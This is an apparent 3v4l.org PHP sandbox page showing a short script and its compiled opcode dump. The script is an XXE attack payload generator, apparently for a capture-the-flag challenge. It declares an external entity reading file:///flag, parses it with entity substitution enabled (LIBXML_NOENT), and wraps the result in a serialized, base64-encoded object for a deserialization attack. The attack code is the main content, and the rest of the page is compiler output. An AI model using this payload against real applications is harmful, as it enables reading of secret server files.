3v4l.org

run code in 500+ PHP versions simultaneously
<?php class UserPref { public $theme; public $lang; } $xml = '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <root>&xxe;</root>'; $obj = new UserPref(); $obj->theme = new SimpleXMLElement($xml, LIBXML_NOENT); $obj->lang = "zh"; echo base64_encode(serialize($obj)); ?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/XAGtm
function name:  (null)
number of ops:  20
compiled vars:  !0 = $xml, !1 = $obj
line      #* E I O op                               fetch          ext  return  operands
-----------------------------------------------------------------------------------------
    7     0  E >   ASSIGN                                                       !0, '%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0A%3C%21DOCTYPE+xxe+%5B%0A%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fflag%22%3E%0A%5D%3E%0A%3Croot%3E%26xxe%3B%3C%2Froot%3E'
   13     1        NEW                                                  $3      'UserPref'
          2        DO_FCALL                                          0          
          3        ASSIGN                                                       !1, $3
   14     4        NEW                                                  $7      'SimpleXMLElement'
          5        SEND_VAR_EX                                                  !0
          6        SEND_VAL_EX                                                  2
          7        DO_FCALL                                          0          
          8        ASSIGN_OBJ                                                   !1, 'theme'
          9        OP_DATA                                                      $7
   15    10        ASSIGN_OBJ                                                   !1, 'lang'
         11        OP_DATA                                                      'zh'
   17    12        INIT_FCALL                                                   'base64_encode'
         13        INIT_FCALL                                                   'serialize'
         14        SEND_VAR                                                     !1
         15        DO_ICALL                                             $10     
         16        SEND_VAR                                                     $10
         17        DO_ICALL                                             $11     
         18        ECHO                                                         $11
   18    19      > RETURN                                                       1

Class UserPref: [no user functions]

Generated using Vulcan Logic Dumper, using php 8.5.0

preferences:
168.8 ms | 1433 KiB | 15 Q